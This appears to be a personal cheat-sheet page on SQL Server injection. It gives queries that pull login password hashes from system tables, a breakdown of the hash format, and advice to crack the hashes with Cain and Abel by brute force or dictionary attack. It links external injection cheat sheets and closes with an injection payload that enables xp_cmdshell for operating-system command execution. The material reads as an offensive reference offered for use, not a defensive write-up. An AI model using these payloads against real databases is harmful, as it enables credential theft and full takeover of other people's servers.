SQL Server Injection: Commands Update

Stealing password hashes:know the table to use

SQL SERVER 2012 http://msdn.microsoft.com/en-us/library/ms187997.aspx and http://msdn.microsoft.com/en-us/library/ms179871.aspx

NO VERSION http://msdn.microsoft.com/en-us/library/ms179503.aspx
SQL SERVER 2000 "Select Password from SysxLogins Where Name = 'XXXX'" Where XXXX is the user

SQL SERVER 2000 "select name,password FROM master.dbo.sysxlogins
SQL SERVER 2005 select password_hash FROM sys.sql_logins
(ref pg 194 of the book "SQL INJECTION attacks and defence")

SQL SERVER 2005: There is no sysxlogins table in SQL 2005. In SQL 2000 also, it was undocumented. You can try using either of the following catalog views:

1. Sys.Server_Principals
2. Sys.sql_logins


http://www.subhashdasyam.com/2011/04/database-password-hashes-cracking.html
SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in 'cain and abel' and then work the case sentive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password_hash) from sysxlogins



List of the type of characters for the Conversion/Casting
http://msdn.microsoft.com/en-us/library/ms187928.aspx

"Update" table syntax
http://msdn.microsoft.com/en-us/library/ms177523.aspx

Information_schema.columns 
http://msdn.microsoft.com/en-us/library/ms188348.aspx
http://msdn.microsoft.com/en-US/library/ms174156(v=sql.90).aspx
http://www.simple-talk.com/sql/t-sql-programming/using-information-schema-views/

Cheatsheets
http://hacktivision.com/index.php/2009/06/17/sql-server-injection-cheat-sheet?blog=2
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://sudomakesandwich.com/2011/01/mysql-sql-server-injection-copy-pasta-cheat-sheet/
http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf


Cheatsheets less useful
http://www.michaelboman.org/books/sql-injection-cheat-sheet-informix
http://sqlservercode.blogspot.co.uk/2007/09/sql-injection-cheat-sheet.html
http://ha.ckers.org/sqlinjection/
http://www.sqlwebpedia.com/content/sql-server-cheat-sheets


Enabling xp_cmdshell

Input:
*Depends on privileges of SQL user

'; EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
Positive Response:

No error